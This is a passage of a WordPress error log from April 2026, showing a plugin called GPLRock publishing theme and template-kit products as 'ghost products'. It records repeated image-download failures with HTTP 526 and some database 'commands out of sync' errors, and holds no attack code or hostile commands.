(attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:07 UTC] GPLRock: Image download failed for product manggis-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manggis---creative-portfolio-wordpress-theme-33747.webp for product manggis-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:10 UTC] GPLRock: Image download failed for product manggis-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:12 UTC] GPLRock: Image download failed for product manggis-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manggis---creative-portfolio-wordpress-theme-33747.webp for product manggis-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:14 UTC] GPLRock WARNING: Image download failed for product manggis-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/manggis---creative-portfolio-wordpress-theme-33747.webp [05-Apr-2026 01:23:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: manggis-creative-portfolio-wordpress-theme [05-Apr-2026 01:23:14 UTC] GPLRock: Image download failed for product kaffa-cafe-coffee-shop-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:16 UTC] GPLRock: Image download failed for product kaffa-cafe-coffee-shop-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kaffa---cafe--coffee-shop-wordpress-theme--rtl-4704.webp for product kaffa-cafe-coffee-shop-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:18 UTC] GPLRock: Image download failed for product kaffa-cafe-coffee-shop-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:20 UTC] GPLRock: Image download failed for product kaffa-cafe-coffee-shop-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kaffa---cafe--coffee-shop-wordpress-theme--rtl-4704.webp for product kaffa-cafe-coffee-shop-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:22 UTC] GPLRock WARNING: Image download failed for product kaffa-cafe-coffee-shop-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/kaffa---cafe--coffee-shop-wordpress-theme--rtl-4704.webp [05-Apr-2026 01:23:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kaffa-cafe-coffee-shop-wordpress-theme-rtl [05-Apr-2026 01:23:23 UTC] GPLRock: Image downloaded successfully for product videomag-magazine-video-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec535dc9.webp [05-Apr-2026 01:23:23 UTC] GPLRock: Using pre-downloaded image for product videomag-magazine-video-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec535dc9.webp [05-Apr-2026 01:23:23 UTC] GPLRock: Ghost product published with image - Product ID: videomag-magazine-video-blog-theme [05-Apr-2026 01:23:23 UTC] GPLRock: Image download failed for product financeplus-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:25 UTC] GPLRock: Image download failed for product financeplus-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/financeplus---consulting-business-wordpress-theme-5420.webp for product financeplus-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:27 UTC] GPLRock: Image download failed for product financeplus-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:29 UTC] GPLRock: Image download failed for product financeplus-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/financeplus---consulting-business-wordpress-theme-5420.webp for product financeplus-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:31 UTC] GPLRock WARNING: Image download failed for product financeplus-consulting-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/financeplus---consulting-business-wordpress-theme-5420.webp [05-Apr-2026 01:23:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: financeplus-consulting-business-wordpress-theme [05-Apr-2026 01:23:32 UTC] GPLRock: Image download failed for product verta-multi-concept-wordpress-theme-for-modern-publishers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:34 UTC] GPLRock: Image download failed for product verta-multi-concept-wordpress-theme-for-modern-publishers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/verta---multi-concept-wordpress-theme-for-modern-publishers-3598.webp for product verta-multi-concept-wordpress-theme-for-modern-publishers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:36 UTC] GPLRock: Image download failed for product verta-multi-concept-wordpress-theme-for-modern-publishers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:38 UTC] GPLRock: Image download failed for product verta-multi-concept-wordpress-theme-for-modern-publishers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/verta---multi-concept-wordpress-theme-for-modern-publishers-3598.webp for product verta-multi-concept-wordpress-theme-for-modern-publishers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:40 UTC] GPLRock WARNING: Image download failed for product verta-multi-concept-wordpress-theme-for-modern-publishers. URL: https://meldwp.com/wp-content/uploads/verta---multi-concept-wordpress-theme-for-modern-publishers-3598.webp [05-Apr-2026 01:23:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: verta-multi-concept-wordpress-theme-for-modern-publishers [05-Apr-2026 01:23:40 UTC] GPLRock: Image download failed for product nito-a-clean-minimal-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:42 UTC] GPLRock: Image download failed for product nito-a-clean-minimal-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nito---a-clean--minimal-multi-purpose-wordpress-theme-9230.webp for product nito-a-clean-minimal-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:45 UTC] GPLRock: Image download failed for product nito-a-clean-minimal-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:47 UTC] GPLRock: Image download failed for product nito-a-clean-minimal-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nito---a-clean--minimal-multi-purpose-wordpress-theme-9230.webp for product nito-a-clean-minimal-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:49 UTC] GPLRock WARNING: Image download failed for product nito-a-clean-minimal-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nito---a-clean--minimal-multi-purpose-wordpress-theme-9230.webp [05-Apr-2026 01:23:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nito-a-clean-minimal-multi-purpose-wordpress-theme [05-Apr-2026 01:23:49 UTC] GPLRock: Image download failed for product california-portfolio-wordpress-theme-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:51 UTC] GPLRock: Image download failed for product california-portfolio-wordpress-theme-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/california---portfolio-wordpress-theme-for-creatives-8162.webp for product california-portfolio-wordpress-theme-for-creatives after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:53 UTC] GPLRock: Image download failed for product california-portfolio-wordpress-theme-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:55 UTC] GPLRock: Image download failed for product california-portfolio-wordpress-theme-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:23:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/california---portfolio-wordpress-theme-for-creatives-8162.webp for product california-portfolio-wordpress-theme-for-creatives after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:23:57 UTC] GPLRock WARNING: Image download failed for product california-portfolio-wordpress-theme-for-creatives. URL: https://meldwp.com/wp-content/uploads/california---portfolio-wordpress-theme-for-creatives-8162.webp [05-Apr-2026 01:23:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: california-portfolio-wordpress-theme-for-creatives [05-Apr-2026 01:25:37 UTC] GPLRock: Image downloaded successfully for product recode-coding-bootcamp-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4185bd0.jpg [05-Apr-2026 01:25:37 UTC] GPLRock: Using pre-downloaded image for product recode-coding-bootcamp-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4185bd0.jpg [05-Apr-2026 01:25:37 UTC] GPLRock: Ghost product published with image - Product ID: recode-coding-bootcamp-elementor-template-kit [05-Apr-2026 01:25:39 UTC] GPLRock: Image downloaded successfully for product rezolve-business-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2fde9e21.jpg [05-Apr-2026 01:25:39 UTC] GPLRock: Using pre-downloaded image for product rezolve-business-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2fde9e21.jpg [05-Apr-2026 01:25:39 UTC] GPLRock: Ghost product published with image - Product ID: rezolve-business-consulting-elementor-template-kit [05-Apr-2026 01:25:41 UTC] GPLRock: Image downloaded successfully for product riclean-cleaning-service-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29328f32.jpg [05-Apr-2026 01:25:41 UTC] GPLRock: Using pre-downloaded image for product riclean-cleaning-service-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29328f32.jpg [05-Apr-2026 01:25:41 UTC] GPLRock: Ghost product published with image - Product ID: riclean-cleaning-service-company-elementor-template-kit [05-Apr-2026 01:25:43 UTC] GPLRock: Image downloaded successfully for product seolla-seo-digital-marketing-agency-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f8b9484.jpg [05-Apr-2026 01:25:43 UTC] GPLRock: Using pre-downloaded image for product seolla-seo-digital-marketing-agency-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f8b9484.jpg [05-Apr-2026 01:25:43 UTC] GPLRock: Ghost product published with image - Product ID: seolla-seo-digital-marketing-agency-template-kit [05-Apr-2026 01:25:45 UTC] GPLRock: Image downloaded successfully for product serenova-psychology-mental-health-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c13e0cf1.jpg [05-Apr-2026 01:25:45 UTC] GPLRock: Using pre-downloaded image for product serenova-psychology-mental-health-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c13e0cf1.jpg [05-Apr-2026 01:25:45 UTC] GPLRock: Ghost product published with image - Product ID: serenova-psychology-mental-health-elementor-pro-template-kit [05-Apr-2026 01:25:48 UTC] GPLRock: Image downloaded successfully for product skycargo-logistic-cargo-logistics-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ce23326d.png [05-Apr-2026 01:25:48 UTC] GPLRock: Using pre-downloaded image for product skycargo-logistic-cargo-logistics-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ce23326d.png [05-Apr-2026 01:25:48 UTC] GPLRock: Ghost product published with image - Product ID: skycargo-logistic-cargo-logistics-elementor-template-kit [05-Apr-2026 01:25:49 UTC] GPLRock: Image downloaded successfully for product softlab-technology-software-saas-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f68a137e.jpg [05-Apr-2026 01:25:49 UTC] GPLRock: Using pre-downloaded image for product softlab-technology-software-saas-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f68a137e.jpg [05-Apr-2026 01:25:49 UTC] GPLRock: Ghost product published with image - Product ID: softlab-technology-software-saas-elementor-pro-template-kit [05-Apr-2026 01:25:51 UTC] GPLRock: Image downloaded successfully for product spinzy-laundry-fresh-clothing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-130da352.jpg [05-Apr-2026 01:25:51 UTC] GPLRock: Using pre-downloaded image for product spinzy-laundry-fresh-clothing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-130da352.jpg [05-Apr-2026 01:25:51 UTC] GPLRock: Ghost product published with image - Product ID: spinzy-laundry-fresh-clothing-elementor-template-kit [05-Apr-2026 01:25:53 UTC] GPLRock: Image downloaded successfully for product playwize-kids-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fdce633.jpg [05-Apr-2026 01:25:53 UTC] GPLRock: Using pre-downloaded image for product playwize-kids-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fdce633.jpg [05-Apr-2026 01:25:53 UTC] GPLRock: Ghost product published with image - Product ID: playwize-kids-education-elementor-template-kit [05-Apr-2026 01:25:54 UTC] GPLRock: Image downloaded successfully for product portaby-freelancer-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2cbf85bb.jpg [05-Apr-2026 01:25:54 UTC] GPLRock: Using pre-downloaded image for product portaby-freelancer-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2cbf85bb.jpg [05-Apr-2026 01:25:54 UTC] GPLRock: Ghost product published with image - Product ID: portaby-freelancer-personal-portfolio-elementor-template-kit [05-Apr-2026 01:25:55 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, wp_prime_option_caches [05-Apr-2026 01:25:55 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT autoload FROM wpwf_options WHERE option_name = '_transient_doing_cron' LIMIT 1 made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, update_option [05-Apr-2026 01:25:55 UTC] WordPress database error Commands out of sync; you can't run this command now for query UPDATE `wpwf_options` SET `option_value` = '1775352355.2701818943023681640625' WHERE `option_name` = '_transient_doing_cron' made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, update_option [05-Apr-2026 01:27:32 UTC] GPLRock: Image downloaded successfully for product gravityview-multiple-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11a814c4.jpg [05-Apr-2026 01:27:32 UTC] GPLRock: Using pre-downloaded image for product gravityview-multiple-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11a814c4.jpg [05-Apr-2026 01:27:32 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-multiple-forms [05-Apr-2026 01:27:34 UTC] GPLRock: Image downloaded successfully for product woocommerce-pagseguro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48e8a9d2.jpg [05-Apr-2026 01:27:34 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pagseguro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48e8a9d2.jpg [05-Apr-2026 01:27:34 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pagseguro [05-Apr-2026 01:27:35 UTC] GPLRock: Image downloaded successfully for product super-forms-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-965c6ae1.jpg [05-Apr-2026 01:27:35 UTC] GPLRock: Using pre-downloaded image for product super-forms-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-965c6ae1.jpg [05-Apr-2026 01:27:35 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-mailchimp [05-Apr-2026 01:27:37 UTC] GPLRock: Image downloaded successfully for product pitch-a-theme-for-freelancers-and-agencies (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-af94c0a3.jpg [05-Apr-2026 01:27:37 UTC] GPLRock: Using pre-downloaded image for product pitch-a-theme-for-freelancers-and-agencies: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-af94c0a3.jpg [05-Apr-2026 01:27:37 UTC] GPLRock: Ghost product published with image - Product ID: pitch-a-theme-for-freelancers-and-agencies [05-Apr-2026 01:27:39 UTC] GPLRock: Image downloaded successfully for product geodirectory-booster (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-299b1730.jpg [05-Apr-2026 01:27:39 UTC] GPLRock: Using pre-downloaded image for product geodirectory-booster: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-299b1730.jpg [05-Apr-2026 01:27:39 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-booster [05-Apr-2026 01:27:41 UTC] GPLRock: Image downloaded successfully for product wp-flat-visual-chat-live-chat-remote-view-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27103740.jpg [05-Apr-2026 01:27:41 UTC] GPLRock: Using pre-downloaded image for product wp-flat-visual-chat-live-chat-remote-view-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27103740.jpg [05-Apr-2026 01:27:41 UTC] GPLRock: Ghost product published with image - Product ID: wp-flat-visual-chat-live-chat-remote-view-for-wordpress [05-Apr-2026 01:27:42 UTC] GPLRock: Image downloaded successfully for product searchwp-nimble-builder-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8390084.jpg [05-Apr-2026 01:27:42 UTC] GPLRock: Using pre-downloaded image for product searchwp-nimble-builder-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8390084.jpg [05-Apr-2026 01:27:42 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-nimble-builder-integration [05-Apr-2026 01:27:45 UTC] GPLRock: Image downloaded successfully for product mainwp-post-dripper (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-26591717.jpg [05-Apr-2026 01:27:45 UTC] GPLRock: Using pre-downloaded image for product mainwp-post-dripper: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-26591717.jpg [05-Apr-2026 01:27:45 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-post-dripper [05-Apr-2026 01:27:46 UTC] GPLRock: Image downloaded successfully for product popup-maker-popup-analytics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b8994bff.jpg [05-Apr-2026 01:27:46 UTC] GPLRock: Using pre-downloaded image for product popup-maker-popup-analytics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b8994bff.jpg [05-Apr-2026 01:27:46 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-popup-analytics [05-Apr-2026 01:27:48 UTC] GPLRock: Image downloaded successfully for product envira-gallery-zoom-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d843fe9b.jpg [05-Apr-2026 01:27:48 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-zoom-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d843fe9b.jpg [05-Apr-2026 01:27:48 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-zoom-addon [05-Apr-2026 01:27:51 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 01:27:51 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775352471.0600800514221191406250', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 01:29:30 UTC] GPLRock: Image download failed for product feux-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:33 UTC] GPLRock: Image download failed for product feux-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/feux---creative-digital-agency-wordpress-theme-12541.webp for product feux-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:29:35 UTC] GPLRock: Image download failed for product feux-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:37 UTC] GPLRock: Image download failed for product feux-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/feux---creative-digital-agency-wordpress-theme-12541.webp for product feux-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:29:39 UTC] GPLRock WARNING: Image download failed for product feux-creative-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/feux---creative-digital-agency-wordpress-theme-12541.webp [05-Apr-2026 01:29:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: feux-creative-digital-agency-wordpress-theme [05-Apr-2026 01:29:39 UTC] GPLRock: Image download failed for product crete-personal-portfolio-and-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:41 UTC] GPLRock: Image download failed for product crete-personal-portfolio-and-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crete---personal-portfolio-and-creative-agency-wordpress-theme-12333.webp for product crete-personal-portfolio-and-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:29:43 UTC] GPLRock: Image download failed for product crete-personal-portfolio-and-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:45 UTC] GPLRock: Image download failed for product crete-personal-portfolio-and-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:29:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crete---personal-portfolio-and-creative-agency-wordpress-theme-12333.webp for product crete-personal-portfolio-and-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:29:48 UTC] GPLRock WARNING: Image download failed for product crete-personal-portfolio-and-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/crete---personal-portfolio-and-creative-agency-wordpress-theme-12333.webp [05-Apr-2026 01:29:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crete-personal-portfolio-and-creative-agency-wordpress-theme [05-Apr-2026 01:29:48 UTC] GPLRock: Image download failed for product mono-multi-purpose-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:39:37 UTC] GPLRock: Image downloaded successfully for product serving-service-business-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f757e61.webp [05-Apr-2026 01:39:37 UTC] GPLRock: Using pre-downloaded image for product serving-service-business-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f757e61.webp [05-Apr-2026 01:39:37 UTC] GPLRock: Ghost product published with image - Product ID: serving-service-business-template-kit [05-Apr-2026 01:39:38 UTC] GPLRock: Image downloaded successfully for product selio-real-estate-directory-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c0902fe.webp [05-Apr-2026 01:39:38 UTC] GPLRock: Using pre-downloaded image for product selio-real-estate-directory-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c0902fe.webp [05-Apr-2026 01:39:38 UTC] GPLRock: Ghost product published with image - Product ID: selio-real-estate-directory-template-kit [05-Apr-2026 01:39:40 UTC] GPLRock: Image downloaded successfully for product seihintech-digital-product-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0448e7c7.webp [05-Apr-2026 01:39:40 UTC] GPLRock: Using pre-downloaded image for product seihintech-digital-product-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0448e7c7.webp [05-Apr-2026 01:39:40 UTC] GPLRock: Ghost product published with image - Product ID: seihintech-digital-product-elementor-template-kit [05-Apr-2026 01:39:41 UTC] GPLRock: Image downloaded successfully for product seeva-medical-dental-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0f977b79.webp [05-Apr-2026 01:39:41 UTC] GPLRock: Using pre-downloaded image for product seeva-medical-dental-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0f977b79.webp [05-Apr-2026 01:39:41 UTC] GPLRock: Ghost product published with image - Product ID: seeva-medical-dental-elementor-template-kit [05-Apr-2026 01:39:43 UTC] GPLRock: Image downloaded successfully for product seavor-sea-adventure-travel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60724727.webp [05-Apr-2026 01:39:43 UTC] GPLRock: Using pre-downloaded image for product seavor-sea-adventure-travel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60724727.webp [05-Apr-2026 01:39:43 UTC] GPLRock: Ghost product published with image - Product ID: seavor-sea-adventure-travel-elementor-template-kit [05-Apr-2026 01:39:44 UTC] GPLRock: Image downloaded successfully for product sealosca-sea-adventure-travel-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b6d83854.webp [05-Apr-2026 01:39:44 UTC] GPLRock: Using pre-downloaded image for product sealosca-sea-adventure-travel-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b6d83854.webp [05-Apr-2026 01:39:44 UTC] GPLRock: Ghost product published with image - Product ID: sealosca-sea-adventure-travel-template-kit [05-Apr-2026 01:39:46 UTC] GPLRock: Image downloaded successfully for product seadive-scuba-diving-centre-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad22ec6d.webp [05-Apr-2026 01:39:46 UTC] GPLRock: Using pre-downloaded image for product seadive-scuba-diving-centre-elementor-template-kit: 